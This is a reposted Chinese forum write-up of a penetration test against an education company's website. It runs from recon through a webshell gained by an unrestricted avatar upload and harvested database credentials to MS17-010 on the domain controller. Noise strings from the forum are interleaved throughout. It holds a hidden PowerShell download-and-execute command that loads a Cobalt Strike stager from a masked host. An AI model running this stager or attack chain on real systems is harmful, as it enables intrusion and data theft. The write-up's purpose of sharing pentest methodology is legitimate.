|
7 x* O) b1 k/ t
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
+ a3 ], F, J8 Y& J1 [) E
& y# `% C$ _4 j4 U/ B3 \" O- z0 Q5 r: f/ | m, x3 y8 t" x4 I
" M5 b3 p% I" U/ v/ c( H
5 }1 [+ ?, I4 x* l$ z5 o9 V$ _7 l0 V
) j9 ]* I; V, L, L- J
正文
# P/ i$ e7 u& b+ P3 w
1 C, @& E$ V8 C8 `4 n
+ X/ Y* p9 r# _( \( l
& S! O8 Y1 Y6 A* ?# Y - Z0 m: c1 ?0 [+ g2 ~2 R) Z( l7 Y8 U9 K
/ m& V. u% U; H. M 目标:www.xxxx.com(一家教育机构)
8 v3 D0 j- E( t- |: Y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: W( Q% D/ i5 r Z1 B) t6 X3 g
3 ^2 b+ Q9 D8 c0 A$ S
8 L% Q/ p& }' t9 r4 [! s9 i 
$ B8 L$ c: [$ G+ q. d: B" ?
% r) B- h! Y5 Q5 b
) W% V9 l1 W2 p/ u4 H 进行了简单的信息搜集
, w9 L7 z! H( d$ v* p3 H; N
. m. V, {% h$ b0 Q/ x; M( M! w, @) V
% K9 ] A1 s% _ J
: N9 c/ |9 M+ S7 O/ D# p# ~+ _
, g9 c$ D/ ?& O& m+ C" U6 L 子域名搜集 Y2 i% d4 F* v0 J3 \
6 y% N& r7 `0 z$ p0 x/ Q
1 w5 F5 X& _4 n9 A" ^+ P 
9 E- x: J2 v/ m# b. [9 k5 [4 F
+ s, |7 s' R/ L% [
$ S) A o, Q5 _) c fofa找资产
4 |4 p4 H/ \; Y$ w0 B5 c! l: \, n% B
$ _2 y( O+ a; @, q8 j
* A4 a& A8 A9 Q ' X/ s( v4 u! \$ ]+ _; W
6 s% `5 Q) q$ a2 d, D
 g8 S* O: `, K( C+ ^( w9 d
; J6 [' x5 R4 H: L
; V" d/ r7 s2 \: _6 c% ^( ^ 一共七个资产。去重之后只有两个。
0 `* X7 x& m. T4 H$ i4 X! x# q
% p5 R6 ^7 \) g2 o
$ u3 H* @; J) t) t7 G & C: ]( f' o; f0 w- c6 V
( y; X4 M; s+ z3 I1 A0 f1 n 目录探测3 Q* s+ r$ J: c. @) e
- i/ P) F2 V3 C' J
/ d" S0 @$ ~* E* Z, x2 F  ! @& Z1 |, A& o! Y0 ~# i5 Y
' \+ n+ p: c2 t& C' F) y
7 K9 h. e+ E& V; K+ k 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" K0 Z" J2 L) E6 v" x9 q
8 W( r! w- h( j9 B
% H( ^; y$ e, ~ : n" h1 R2 @( d- L1 J+ `
# X) W* W1 l, y; o# J( y' C
我又尝试了通过修改返回包来绕过登录界面
, H2 I. D. i' L7 S ( r& {2 n( t0 \
8 q8 c* A, C, M7 H( a
 : U3 z" v! X# ?6 r( T
. B; g( u# F6 r( ~9 }5 W' I* Z# n. d* s1 D
还是不行,尝试注入无果
9 g0 G+ y) ~- B* o Y! a + @8 ^9 R) p; u3 u
5 T0 d: p3 S5 X* j2 ?
 ; e W& L4 C d- N* E! o6 c1 I
% P( O4 U; c3 P' n, U* Z* ]
$ h/ D1 k6 Z# }3 P2 k% H 不过我目录探测出了一处Spring信息泄露
0 a# [/ `1 ^* n
H. j" q( a7 Y
# x/ u/ O% i$ z4 C. E3 B) A% } 0 z2 k" n: F% A" T
- ~1 R, n5 l6 ~7 S+ F: C7 b 
( f' \1 f% H* m4 U' s) B G
' i9 j% q8 V! b9 e9 m i4 a4 y* p1 j1 T& V
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录. Y' F" G8 ~' A4 X: \
7 d9 U$ Y! O0 Q* R3 q" |5 B% R' c7 o7 O8 m& s; G- k5 U+ w1 K4 a
# n& b' k: A, K% }% T t# @ # e* o" m# ]' L+ L
! E3 \" c" \% v' d/ y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。6 e6 B' c& Z& @- H W* ]; \- k* e
+ z' `1 ` G' \0 U# Z
0 d9 D; I+ }. S. R
; v2 u! C/ Z; u" p r) z P7 q + F# O" \7 M& G! Q) [ g( ~) O' T) H
) H' Y7 m7 T' G! h7 h
获取有些师傅到这一步就手机抓包电脑测了。( O7 Q/ G( f) i8 c7 K* e# B0 f
6 J8 A8 k1 l1 @- }5 V" Y5 }6 |6 _7 j# k
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 {( Y, y" k9 `- J+ T
7 h: q) W. O3 N' h
$ \( Q& C! c j, v2 j: {" J 其中在一个公众号发现了小程序,可以进行注册。% e% l2 \& H w1 n& _& E
2 b' Z# Z" m; E2 c% w7 I' R* j9 K/ Y9 G2 a, K% ^' P
看到了头像上传,尝试上传获取WebShell R, d% `3 U" a& |
: z' p; k7 {. V% [3 G) }! q7 @7 F
6 ?! w% o! E. v% \ 
8 s2 s3 S4 u7 B: d% D( N$ K $ n5 Z, n) L3 h& x9 Q
r* c; `6 ^/ i1 N6 E& Z
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 _# Q5 ?) q& r6 d0 V6 R 7 a6 A& F; a) x; l- O w2 g0 T
! W3 W! A6 l% X/ W 
8 ^, O" F+ @, a7 h k) N
& J8 _9 F0 z3 V* n
. b- l( ~3 `! H! O: E" r/ ? 然后上了大马0 g# F F3 n E+ {" j. B
4 m# J" K0 R, }( }2 L
# C" `4 k' q) a* {# c4 u" f* Z  0 W7 R$ n* m% J
# u* m1 A6 \! G2 m- W( q$ B
5 I9 G4 h8 d. l% e4 ?4 g) z  - q N! |" Y* u' V& ]3 n
+ H( q& m) b% P B
_: q; @0 L0 M1 z! C3 u+ H 通过翻找文件发现数据库账号密码6 a' d4 r( d* D3 k/ y- k
8 I4 v) U! f* Y
! g" g6 j/ S( B4 r' e! i
 / C! e3 @3 ^1 r# W5 g1 u
$ ~: s+ X- P9 g: ?9 b- B
( T# x1 i, n' h \4 { --内网渗透
% f7 I" s# F# X+ s5 f , j+ q7 @7 z4 g( L
1 W( u1 \) x! g. B- j- u0 [6 ^' f 直接通过powershell执行 cs上线
. F! B0 K& z* s$ ~
/ m; J w5 v4 {& n
- V1 J" M" q, m8 L! {. l/ } powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
, U% \6 C0 j3 y, b$ x( j ' [% I ~( v) y/ F
, u; N2 r. m8 A# l( C4 d
3 X9 h3 m& g0 o0 T6 w2 e( K1 i6 Q ) v0 ^' R1 d \5 y$ E
7 V+ w" J* ^ h 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
" y D$ x" h# R - V5 E; v) K0 X9 {
) ^ B% Y* J4 }' u  " Z) r( k( f; {. B5 `/ k
$ Q) }/ H$ C0 o n6 o3 _. d ^: L8 X7 q0 {* e$ _5 P$ C
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
+ l9 p, `$ Z: Y6 \" `5 D* Z& b( e4 c
5 }# ^- e) k- q. X8 f
1 O8 \+ }. p+ z" u* e j3 @3 `+ A: M9 [ u; z( O: [
5 [+ @0 @, ]6 g4 |; Z
@+ f) Y- g* `2 X* u9 V; N! O. {" X5 k  ; @+ {, [7 k0 U, p
+ X/ {! E' A! o' Q; r
, O$ a D ~3 f8 L- `6 K# a% |0 ] 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
( @" ]0 |# N& w* n. C& x/ B' g; m
4 S0 }' j% m; \' L8 o0 p
$ n* H2 Z9 F$ \. A! A) J) u0 [
5 ~, T# P4 u$ K6 v! A4 ~0 i8 y8 M$ W- f' f
 ! i( x' b- a& M$ m3 D4 X( p
7 B9 s3 i8 e N) {% V0 Q3 ]( I" s( `' r5 l
+ b( G6 r2 R5 n( |1 n; _
& X0 @4 j L7 r# W/ I& _* C( K
& L a+ U& _' J+ h8 i8 A# c9 b& x
. w$ k R' _: n- j
: S- V+ s3 Y+ y% }" E9 W9 ~
) h$ \+ u: `& k& |
8 A# o8 p) a7 k- s( H* H
( j" j1 [6 I: S2 x& a/ {( y 小结7 B) {- s- M* Z' `
9 [5 J5 J9 p0 Z
7 u$ V" C" [' h0 |' P! y
5 _3 O( \2 `" ]1 B- v, o
! Z) e) C. n( s) ^) V4 k4 `% D( Z- S1 S4 S p
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. Y+ X) n( C* r/ ]" X: ^
. t0 o8 E" B( K! c9 `5 t( B( l2 ]" @$ f
* U2 G, b- Z' Z! ~$ H: b* M: E
: h( X3 U+ W& Y8 m9 V
* U) ], e5 G4 o - 2 F& O3 C- w5 k5 o# b
! ?5 N/ v. s1 a. g
0 p0 m) c4 ]7 b7 g
- & C. Q$ U. x2 N" r! W) p, I
3 A8 a a" R( V n; y/ V3 Y3 w
" s+ M$ d& M' R W1 f& l9 Z
7 }3 n% s3 x( D; h: L
; Y, c& P, t/ M e f- q 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
: D/ q2 T4 w' y* G& M9 m" u % ]# ~! n6 e a/ C1 B3 \
. W b7 R% `/ B1 c( `: o& l
% p1 }8 m! m v: [3 m R | 
发表于 2024-3-1 19:41:32
收藏
支持
反对